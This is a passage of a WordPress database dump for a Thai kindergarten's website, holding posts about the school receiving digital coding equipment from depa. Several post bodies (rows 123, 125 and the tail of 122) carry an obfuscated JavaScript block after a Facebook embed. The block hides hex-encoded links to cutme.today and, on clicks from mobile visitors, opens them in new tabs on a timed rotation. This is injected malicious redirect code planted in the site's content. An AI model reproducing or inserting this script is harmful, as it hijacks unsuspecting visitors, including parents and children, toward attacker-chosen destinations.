_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-07-29 18:50:15','2024-07-29 11:50:15','',19,'http://watprato.ssk.in.th/?p=122',0,'revision','',0),
(123,1,'2024-07-29 18:51:49','2024-07-29 11:51:49','<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3Dpfbid02oDjzefbaK7hfqXZGYeAM25CwK7P68AqTU3gEPRbn8XVYnLUhGiy6qLhQqa3e6aVml%26id%3D61556083436494&show_text=true&width=500\" width=\"500\" height=\"736\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โรงเรียนอนุบาลวัดพระโต นำโดยคณะผู้บริหาร พร้อมด้วย คณะครูผู้รับผิดชอบโครงการ รับมอบอุปกรณ์ดิจิทัลตามโครงการ Coding for Better Life สร้างรากฐานอนาคตประเทศไทย สำหรับจัดกิจกรรมส่งเสริมการเรียนรู้ด้าน Coding อย่างมีประสิทธิภาพ ส่งมอบโดยสำนักงานส่งเสริมเศรษฐกิจดิจิทัล (depa)','','publish','open','open','','%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%ad%e0%b8%99%e0%b8%b8%e0%b8%9a%e0%b8%b2%e0%b8%a5%e0%b8%a7%e0%b8%b1%e0%b8%94%e0%b8%9e%e0%b8%a3%e0%b8%b0%e0%b9%82%e0%b8%95-5','','','2024-07-29 18:51:50','2024-07-29 11:51:50','',0,'http://watprato.ssk.in.th/?p=123',0,'post','',0),
(124,1,'2024-07-29 18:51:36','2024-07-29 11:51:36','','450261305_122162186144202781_7069656528638807611_n','','inherit','open','closed','','450261305_122162186144202781_7069656528638807611_n','','','2024-07-29 18:51:36','2024-07-29 11:51:36','',123,'http://watprato.ssk.in.th/wp-content/uploads/2024/07/450261305_122162186144202781_7069656528638807611_n.jpg',0,'attachment','image/jpeg',0),
(125,1,'2024-07-29 18:51:49','2024-07-29 11:51:49','<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3Dpfbid02oDjzefbaK7hfqXZGYeAM25CwK7P68AqTU3gEPRbn8XVYnLUhGiy6qLhQqa3e6aVml%26id%3D61556083436494&show_text=true&width=500\" width=\"500\" height=\"736\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โรงเรียนอนุบาลวัดพระโต นำโดยคณะผู้บริหาร พร้อมด้วย คณะครูผู้รับผิดชอบโครงการ รับมอบอุปกรณ์ดิจิทัลตามโครงการ Coding for Better Life สร้างรากฐานอนาคตประเทศไทย สำหรับจัดกิจกรรมส่งเสริมการเรียนรู้ด้าน Coding อย่างมีประสิทธิภาพ ส่งมอบโดยสำนักงานส่งเสริมเศรษฐกิจดิจิทัล (depa)','','inherit','closed','closed','','123-revision-v1','','','2024-07-29 18:51:49','2024-07-29 11:51:49','',123,'http://watprato.ssk.in.th/?p=125',0,'revision','',0),
(126,1,'2024-07-29 18:52:42','2024-07-29 11:52:42','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_93202e-5b\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_e4ac7a-c6\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_e4ac7a-c6\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_fdcfc1-e7\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b